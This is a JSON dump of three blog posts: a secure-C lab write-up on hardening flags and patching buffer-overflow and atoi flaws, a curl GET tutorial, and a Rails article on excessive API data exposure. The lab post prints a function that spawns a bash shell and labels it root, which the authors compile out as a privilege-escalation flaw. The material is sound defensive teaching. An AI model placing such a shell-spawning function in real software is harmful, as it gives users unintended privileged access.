It introduces a potential risk because unresolved symbols could be hijacked before the program fully resolves them, weakening security. -Wl,-z,noexecstack: This flag marks the stack as non-executable, which prevents code from being executed on the stack. This helps mitigate attacks like buffer overflows that try to execute shellcode on the stack. Recommendation: Keep this flag. It is an essential security feature that helps prevent stack-based code execution vulnerabilities. Security Enhancements Summary: # Remove -D_FORTIFY_SOURCE=0: Reinstate compiler security checks for bounds checking and other safeguards by setting it to 2. Remove -fno-stack-protector: Keep stack protection enabled to defend against stack overflow attacks. Remove -Wl,-z,lazy: Avoid lazy symbol resolution to reduce potential vulnerabilities related to unresolved symbols. Keep -Wl,-z,noexecstack and -pie: These flags enhance security by preventing stack execution and enabling position-independent executables. The proposed secured configuration:\nLEGCFLAGS =-fpie -O2 -D_FORTIFY_SOURCE=2 -fstack-protector-strong LEGLDFLAGS =-pie -Wl,-z,relro -Wl,-z,now -Wl,-z,noexecstack Note that _FORTIFY_SOURCE only takes effect when optimization is enabled, hence the added -O2. When trying to build the Makefile with the secured configuration, we discovered a warning that stops the code from building, so we added a bypass for that specific warning: -Wno-unused-result. Since we were merely trying to see how the compilation-level mitigations carry out, we ignored this code-level warning. We successfully built the program after bypassing the unused-result warning. We then tried to carry out the buffer overflow attack again and could see that the attack is detected and the program terminated. How It Enhances Security # Memory Safety: Prevents stack-based buffer overflows (-fstack-protector-strong). Disallows execution of code on the stack (-z noexecstack). Exploit Mitigation: ASLR support makes memory addresses unpredictable (-fpie, -pie). RELRO ensures critical relocation structures are immutable (-Wl,-z,relro -Wl,-z,now). 
Improved Code Quality: Enforces secure coding standards and flags potential vulnerabilities during compilation (-Wall -Wextra -Werror). Runtime Safety: Uses trusted library paths and avoids unsafe or unverified libraries. In order to prevent the buffer overflow and lack of user input validation vulnerabilities discovered, we patched the validation_functions.c source code.\nHow to patch the vulnerabilities above # The source code below is the patched code of validation_functions.c\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; #include \u0026lt;string.h\u0026gt; #include \u0026#34;validation_functions.h\u0026#34; int fnchck(int a, int b) { int check; if (b == a) { puts(\u0026#34;Valid access.\u0026#34;); check = 0xf; } else { check = 0; } return check; } int validate(char * argv[]) { // Use malloc to dynamically allocate memory at runtime char *buffer = (char *)malloc(20); if (buffer == NULL) { return 1; } printf(\u0026#34;You entered %s and %s. \\nDo you agree ? (Y,n):\\n\u0026#34;, argv[1], argv[2]); // Use fgets to read the user input since it only writes up to the buffer size, thus preventing buffer overflow fgets(buffer, 20, stdin); // Strip the trailing newline that fgets keeps so the comparisons work buffer[strcspn(buffer, \u0026#34;\\n\u0026#34;)] = \u0026#39;\\0\u0026#39;; // Return 0 if buffer == \u0026#34;Y\u0026#34; or buffer == \u0026#34;y\u0026#34;, since main treats 0 as success int result = !((strcmp(buffer, \u0026#34;Y\u0026#34;) == 0) || (strcmp(buffer, \u0026#34;y\u0026#34;) == 0)); // Free the allocated memory only after the comparisons are done free(buffer); return result; } The code above does the following:\nchar *buffer = (char *)malloc(20); will dynamically assign memory to our buffer at run time. This allows memory to be allocated at random addresses when ASLR is active. We also check that the allocation succeeded before using it. fgets(buffer, 20, stdin). fgets is more secure compared to scanf. The fgets function ensures that no more than 19 characters are read, preventing buffer overflow when saving the input to buffer and leaving space for the null terminator. Because fgets keeps the trailing newline, we strip it with strcspn before comparing. The return statement in the initial code had two issues. First, it used the \u0026amp;\u0026amp; comparator, which meant that if the user inputs \u0026ldquo;Y\u0026rdquo;, the comparison strcmp(buffer, \u0026ldquo;y\u0026rdquo;) would always evaluate to 1, causing the return to fail. This bug was fixed by combining the comparisons with ||. Second, since main treats validate(argv) == 0 as success, the combined comparison is negated so the function returns 0 on agreement, and buffer is freed only after the comparisons, because freeing it first would make the strcmp calls a use-after-free. The source code below, in action_functions.c, is vulnerable because the fnR function gives the user a root shell on the terminal, which is a privilege escalation. 
The solution to this problem would be to either delete the code, as it is unused, or exempt it from the executable file during compilation.\n#include \u0026#34;action_functions.h\u0026#34; #include \u0026lt;stdio.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; void fnr(void) { puts(\u0026#34;The door is locked.\u0026#34;); return; } void fngrt(void) { puts(\u0026#34;Opened.\u0026#34;); puts(\u0026#34;No root.\u0026#34;); return; } // To keep the unused fnR function out of the executable, guard it with #ifndef IGNORE_FUNCTION and pass the flag -DIGNORE_FUNCTION to the compiler #ifndef IGNORE_FUNCTION void fnR(void) { puts(\u0026#34;Opened.\u0026#34;); puts(\u0026#34;Be careful, you are ROOT !\\n\u0026#34;); int value = system(\u0026#34;/usr/bin/env PS1=\\\u0026#34;SUPPOSED ROOT SHELL \u0026gt; \\\u0026#34; python3 -c \u0026#39;import pty; pty.spawn([\\\u0026#34;/bin/bash\\\u0026#34;, \\\u0026#34;--norc\\\u0026#34;])\u0026#39;\u0026#34;); exit(value); } #endif The code snippet above shows the solution, which wraps the function in an #ifndef IGNORE_FUNCTION guard, where IGNORE_FUNCTION is the flag we will pass to the compiler using the -D flag. This is the complete compilation command to use -DIGNORE_FUNCTION\nIn the main.c function, the atoi() function, which converts user input to an integer, is considered unsafe because it does not check for errors before converting the string to an integer. In the door-locker program, if the user inputs two different non-numeric strings, the door would open, because atoi() silently returns 0 for both, so the values compare equal. This vulnerability exists because we are using atoi(). 
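The difference between the two conversion functions can be sketched as follows. unsafe_equal and parse_long are illustrative helpers, not functions from the lab's source:

```c
#include <errno.h>
#include <stdlib.h>

/* Demonstrates the door-locker bug: atoi() silently returns 0 for
 * non-numeric input, so two different garbage strings compare equal. */
int unsafe_equal(const char *a, const char *b) {
    return atoi(a) == atoi(b);
}

/* strtol-based check: *ok is set to 1 only if str is entirely a valid
 * in-range number, letting the caller reject garbage input instead of
 * treating it as 0. */
long parse_long(const char *str, int *ok) {
    char *end;
    errno = 0;
    long value = strtol(str, &end, 10);
    /* reject empty input, trailing garbage, and out-of-range values */
    *ok = (end != str && *end == '\0' && errno != ERANGE);
    return value;
}
```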
To fix this vulnerability, we replaced the atoi() function with the strtol() function, which lets us detect when the input isn\u0026rsquo;t a valid number, as shown in the patched code below.\n#include \u0026lt;stdio.h\u0026gt; #include \u0026lt;stdlib.h\u0026gt; #include \u0026#34;action_functions.h\u0026#34; #include \u0026#34;validation_functions.h\u0026#34; int main(int argc, char * argv[]) { int check; int in0; int in1; char *end0; char *end1; if (argc == 3) { check = validate(argv); if (check == 0) { puts(\u0026#34;\\nChecking values\u0026#34;); // Use strtol with error checking since atoi performs none in0 = (int)strtol(argv[2], \u0026amp;end0, 10); in1 = (int)strtol(argv[1], \u0026amp;end1, 10); // Reject arguments that are not entirely numeric if (*end0 != \u0026#39;\\0\u0026#39; || *end1 != \u0026#39;\\0\u0026#39;) { puts(\u0026#34;Usage : client \u0026lt;chiffre0\u0026gt; \u0026lt;chiffre1\u0026gt;\u0026#34;); return 1; } check = fnchck(in1, in0); if (check == 0xf) { fngrt(); } else { fnr(); } } else { fnr(); } check = 0; } else { puts(\u0026#34;Usage : client \u0026lt;chiffre0\u0026gt; \u0026lt;chiffre1\u0026gt;\u0026#34;); check = 1; } return check; } How to avoid these mistakes in the future # The vulnerabilities identified and addressed in the source code highlight some of the security concerns we can introduce to our code. Below is a detailed plan for the future software development process to mitigate such mistakes before the code is released:\nUse Secure Coding Practices\nAlways validate and sanitize user input to prevent unexpected behavior. Use safer alternatives like fgets instead of gets or scanf to avoid buffer overflows. Dynamically allocate memory using malloc only when necessary. Always check for successful allocation using malloc or calloc and free the memory after use to prevent memory leaks in the code. Ensure Code Review and Auditing\nPeer review all new code for adherence to security guidelines. Use static analysis tools (e.g., SonarQube, Coverity) to identify vulnerabilities such as buffer overflows or use of unsafe functions. Periodically review older code to find unused functions, insecure patterns, and deprecated APIs, functions, and dependencies, and update them to the recommended alternatives. 
Remove unused functions or ensure they are excluded from compilation (e.g., through macros using #ifdef). Enable Compiler Flags for Security\nUse flags like -D_FORTIFY_SOURCE=2 to add compile-time and runtime checks for common buffer overflow vulnerabilities in string and memory functions. Employ -DIGNORE_FUNCTION to exclude unused functions from the build. Use the -fstack-protector-all flag to enable stack protection (canaries) for all functions. Use Linker Flags\nTo ensure the stack is non-executable (a key part of preventing exploit execution), you should also link with the -z noexecstack flag to mark the stack as non-executable, e.g., gcc -o my_program my_program.c -fstack-protector-all -fcf-protection -z noexecstack Conclusion # This lab focused on enhancing the security of a C program by identifying and mitigating potential vulnerabilities using static code analysis and compiler/linker options. Through the use of cppcheck, we identified issues such as unsafe scanf() usage and variable scope problems. Additionally, we explored vulnerable compiler and linker options that could make the program susceptible to attacks like buffer overflows and memory corruption.\nBy applying secure coding practices and adjusting compilation settings, such as enabling stack protection, disabling executable stacks, and using modern C standards, we significantly improved the program’s security posture. We also addressed the buffer overflow vulnerability by replacing unsafe functions with safer alternatives like fgets() and dynamically allocating memory with proper bounds checks.\nThese enhancements not only mitigate common attack vectors but also enforce better coding standards and runtime safety, making the program more resilient to exploitation. 
Through this process, we reinforced the importance of secure programming practices, both in code and in the compilation process, to protect against malicious exploits.\nAdditionally, we found that the differences between the compared binaries of the two programs did not seem to be related to how the program was compiled. This led us to think that the source code might have been altered in some way, and may not have been identical to start with. However, it is also reasonable to consider that Ghidra’s interpretation of a binary file could vary, potentially influencing how the differences were observed.\nWe also had the opportunity to explore different compiler options in depth, particularly by utilizing the checksec function (from the manual). This provided valuable insights into various security features enabled or disabled by the compiler and further emphasized the importance of thoroughly reading the manual to understand the implications of different compiler flags. Understanding these options allows developers to make informed decisions about which security measures to apply during the compilation process, enhancing the overall security of the program.\n","date":"1 December 2024","permalink":"/njeri/posts/buffer_overflow_c/","section":"Posts","summary":"Introduction # The objective of this lab is to build on our understanding of secure programming in C by analyzing, enhancing, and securing the functionality of the program from Project Lab 1, with a focus on identifying and mitigating vulnerabilities and improving resilience against attacks like fuzzing.\nThis lab focuses on identifying vulnerabilities in the source code, applying and validating patches, and proposing future best practices to prevent similar issues. Additionally, we will analyze the code using security analysis tools (cppcheck) to find out about the vulnerabilities in code. 
After compiling the project, we will inspect the resulting binary in Ghidra to identify similarities and differences, which will further inform our understanding of the program\u0026rsquo;s security and allow us to apply effective mitigations.","title":"Secure Programming in C: Buffer Overwrites and Overflows"},{"content":"","date":"16 September 2023","permalink":"/njeri/tags/getting-started/","section":"Tags","summary":"","title":"Getting Started"},{"content":"Getting Started With GET Curl Commands # Introduction to curl # curl is a command-line tool used on the terminal to make network requests using various protocols. curl is designed to aid with data transfer to and from a server without the need for a web browser. With curl, you can upload or download files and send requests to API endpoints to simulate user interaction from the terminal, using a supported protocol such as HTTPS, FTP, and more.\nExplanation of GET requests\nWebpages display content to the end-user by requesting resources from the server. These requests are commonly made using a GET HTTP request, often accompanied by query parameters when necessary.\nThis guide shows you how to run GET requests using curl commands on the terminal.\nPrerequisites\nA Mac, Windows, or Linux laptop Access to the terminal curl installed on your machine. To verify that curl is installed, run the command curl --version on the terminal. If properly installed, it will output the installed curl version.\nSending GET Requests with Curl # The GET command in curl is used to perform a GET request to the specified URL and retrieve content from the server. 
The basic syntax for GET commands is as follows: curl [OPTIONS] [URL] [OPTIONS] - curl parameters such as -o to specify where to save the output.\n[URL] - specify the URL or sequence of URLs you want to make a request to.\nThe curl request below performs a GET HTTP request, fetches the content at the specified URL, and then prints the response body on the terminal:\ncurl https://documentwrite.dev/\nUsage # Downloading an image using curl\nTo download this image, https://documentwrite.dev/wp-content/uploads/2021/08/document-write-logo.png, using curl, follow these steps on your terminal:\nOpen the terminal or command prompt. Navigate to the path where you want to save the image. In this case, the pictures directory, using the command cd pictures Run the following command to download the image: curl -o logo.png https://documentwrite.dev/wp-content/uploads/2021/08/document-write-logo.png The command above does the following: -o logo.png specifies the name of the file in which to save the response output.\nhttps://documentwrite.dev/wp-content/uploads/2021/08/document-write-logo.png is the URL of the logo you want to download.\nCheck that the image file has downloaded successfully to the pictures folder.\nConclusion # In this guide, we learned about curl and how to use the GET curl command to download an image from a URL. Curl is a powerful tool that can be used for various data transfer tasks, and its simplicity makes it accessible even to non-coders.\nRemember to adjust the command and URL according to your specific use case.\n","date":"16 September 2023","permalink":"/njeri/posts/get_curl_commands/","section":"Posts","summary":"Getting Started With GET Curl Commands # Introduction to curl # curl is a command-line tool used on the terminal to make network requests using various protocols. curl is designed to aid with data transfer to and from a server without the need for a web browser.
With curl, you can upload or download files and send requests to API endpoints to simulate user interaction from the terminal, using a supported protocol such as HTTPS, FTP, and more.\nExplanation of GET requests\nWebpages display content to the end-user by requesting resources from the server. These requests are commonly made using a GET HTTP request, often accompanied by query parameters when necessary.","title":"Getting Started With GET Curl Commands"},{"content":"For software engineers, it may be easy to assume that no hacker would target our app since it isn’t big or well known. This attitude can lead to recklessness and weaker measures for securing data in an app. However, it’s important to remember that data collected by an organization is very valuable. There can also be legal consequences in terms of lawsuits against the business that ensue from leakage of a user’s personally identifiable information (PII).\nWhat Is Excessive Data Exposure? # Excessive data exposure occurs when an API response returns more data than the client needs. As a rule of thumb, if a client application needs three fields, for example, you shouldn’t return the whole object. Excessive data exposure is a big API security concern that should be at the top of every engineer’s mind when designing APIs. In this post, you’ll learn about excessive data exposure in Ruby on Rails. By the end of the post, you’ll have learned about the following topics:\nLevels of data sensitivity Examples of excessive data exposure in Ruby on Rails Excessive data exposure prevention measures Levels of Data Sensitivity # Once data has been obtained from users, it’s classified according to its sensitivity in terms of the effects it could have on an organization if altered or stolen by a third party. In this section, you’ll learn about the four levels into which you should classify your data.\nPublic: This is data that poses no security threat when presented to the general public.
This includes data such as workers’ directories, password validation prompts, etc. Internal: This is internal data that is used within the organization and would be harmful if exposed to people outside the organization. An example is email correspondence that doesn’t contain confidential information. Sensitive: This is data that belongs to users in an organization and is highly confidential. Examples are credit card information, social security numbers, API keys, access tokens, etc. Restricted: This is data that only a few members of an organization have access to, such as highly classified business information. Now that you’ve learned about the different tiers of data sensitivity, in the section below, we’ll take a look at a sample API response in order to learn more about excessive data exposure. Sample API Response # For this example, let’s say the API of a gaming application that shows a user’s profile returns a raw user object like the code snippet below to the client application:\n{ \u0026quot;id\u0026quot;: 34, \u0026quot;username\u0026quot;: \u0026quot;trojan\u0026quot;, \u0026quot;level\u0026quot;: 7, \u0026quot;location\u0026quot;: \u0026quot;Nairobi, Kenya\u0026quot;, \u0026quot;phone_no\u0026quot;: \u0026quot;+254678543110\u0026quot;, \u0026quot;bio\u0026quot;: \u0026quot;Kenyan gamer\u0026quot;, \u0026quot;address\u0026quot;: \u0026quot;Corner Street, Karen, house 24\u0026quot;, \u0026quot;access_token\u0026quot;: \u0026quot;FLWSECK_TEST-917984d85944319929e4280429ce5523-X\u0026quot; } At first glance, you may not notice anything wrong with the API response above.
But you\u0026rsquo;ll see in the next section how returning this kind of raw data can lead to excessive data exposure in your Rails application.\nExamples of Excessive Data Exposure # The API response above leads to excessive data exposure in the following ways.\nReturning Unfiltered Data # The API response above returns raw unfiltered data, leaving the client app to filter out sensitive information about the user. The client application only needs the username, bio, and level fields, making the extra fields that are returned useless. In this instance, returning more data than the client application needs is a case of excessive data exposure. If a hacker were to intercept this API response, they could view all the sensitive data and, worse, make a copy of the data and sell it on the dark web.\nUsing Auto-Incrementing Primary Keys # A Postgres database, by default, uses auto-incrementing primary keys unless otherwise specified. Since the primary keys are sent with the URL as an ID, anyone sniffing the website traffic could access the ID, which would be a sequentially incrementing integer. It lets the third party know the order of magnitude of a database. For example, if the API to get a user’s data is /user/1870, they know that your database has stored data for a couple of thousand users.\nReturning Personally Identifiable Information in an API Response # PII is any data that can be used to identify a person and should never be shown on a website or mobile app. PII includes the ID number, email, credit card details, social security number, home address, driver’s license, etc. of a person. Returning PII in an API response is a big data breach and a case of excessive data exposure. If hackers gain access to PII, when discovered, this could result in lawsuits from users, which could then lead a small company to bankruptcy. API security is extremely important for both the company and its users.
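To make the unfiltered-response problem concrete, here is a minimal plain-Ruby sketch of server-side whitelisting. The field names mirror the hypothetical gamer profile above (the token value is shortened); in a real Rails controller you would typically pass the same whitelist to as_json(only: ...) or to a serializer:

```ruby
# Raw record as it might come out of the database
# (hypothetical fields matching the sample response above).
raw_user = {
  "id"           => 34,
  "username"     => "trojan",
  "level"        => 7,
  "bio"          => "Kenyan gamer",
  "phone_no"     => "+254678543110",
  "access_token" => "FLWSECK_TEST-..."
}

# Whitelist only the fields the client actually needs;
# everything else never leaves the server.
PUBLIC_FIELDS = %w[username bio level].freeze
safe_user = raw_user.slice(*PUBLIC_FIELDS)
# safe_user => {"username"=>"trojan", "bio"=>"Kenyan gamer", "level"=>7}
```

The point of doing this on the server rather than in the client app is that intercepted traffic only ever contains the whitelisted fields.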
You’ve seen instances of excessive data exposure and how API design flaws lead to security vulnerabilities. In the next section, let’s learn about preventive measures.\nProtective Measures # Listed below are some of the ways you can protect your Rails application against excessive data exposure.\nDon’t Use Auto-Incrementing Primary Keys # Since primary keys are publicly discoverable in the URLs and network logs as ID values, it’s better to use universally unique identifiers (UUIDs). UUIDs are random and unique, and nobody can guess the order of magnitude of your database.\nImplement Server Authorization Checks # Use the CanCanCan authorization gem. It defines access rules that restrict someone from viewing somebody else’s record by changing the ID in the URL. The user cannot change the ID in the URL to view another user’s profile data unless authorized.\nUse Data Masking # Data masking is used to hide sensitive information in your database, like a user’s email, and only display the nonsensitive information in an API response.\nEncrypt Your Data # If your app must store personally identifiable information, it should all be encrypted. Encryption protects all sensitive information from prying eyes. With encryption, even if an attacker got a snapshot of your database or API response, they wouldn’t be able to make sense of the data.\nUse Hashing # Use hashing to secure the database fields that contain PII.\nDon’t Return a Raw Unfiltered API Response # When designing APIs, use the principle of least privilege by only returning the data a user needs. Returning raw unfiltered data to a mobile or web application is never a good idea. Examine every API response, and filter out the data the user doesn’t need on the server before it’s presented to the client.\nDon’t Store Sensitive PII Data # Use a third party to store sensitive data. For example, you should store all credit card details with a third party like Stripe.
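As one illustration of the data-masking idea, here is a small hand-rolled Ruby helper. This is a hypothetical sketch, not the API of any particular masking gem:

```ruby
# Mask an email address so an API response reveals only a hint:
# keep the first two characters of the local part, star the rest,
# and leave the domain visible.
def mask_email(email)
  local, domain = email.split("@", 2)
  # If the value doesn't look like an email, return it unchanged.
  return email if domain.nil? || local.empty?

  stars = "*" * [local.length - 2, 1].max
  "#{local[0, 2]}#{stars}@#{domain}"
end

mask_email("trojan@example.com")  # => "tr****@example.com"
```

A real application would apply masking like this in the serializer layer, so the raw value never appears in any response body at all.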
In this scenario, under no circumstances will the credit card details show up in any API request since you don’t store them in your own database. Using what you’ve learned in this article, you should evaluate whether your APIs are secure. If they’re not, you should consider using some of the preventive measures stated above.\nConclusion # In this post, you learned what excessive data exposure is, the levels of data sensitivity, and examples of how you could contribute to excessive data exposure when designing your Rails APIs. Finally, you learned about the measures you need to put in place to prevent excessive data exposure. Data is a very important asset for any company and should be protected at all costs. Ensuring your users’ data is secure protects your company from losses emanating from lawsuits and protects the company’s image. In the case of API requests, you shouldn’t return all the fields stored in the database by default. Data security helps customers trust your business with their data.\n","date":"18 May 2022","permalink":"/njeri/posts/rails_excessive_data_exposure/","section":"Posts","summary":"For software engineers, it may be easy to assume that no hacker would target our app since it isn’t big or well known. This attitude can lead to recklessness and weaker measures for securing data in an app. However, it’s important to remember that data collected by an organization is very valuable. There can also be legal consequences in terms of lawsuits against the business that ensue from leakage of a user’s personally identifiable information (PII).\nWhat Is Excessive Data Exposure? # Excessive data exposure occurs when an API response returns more data than the client needs. As a rule of thumb, if a client application needs three fields, for example, you shouldn’t return the whole object.","title":"Rails Excessive Data Exposure"}]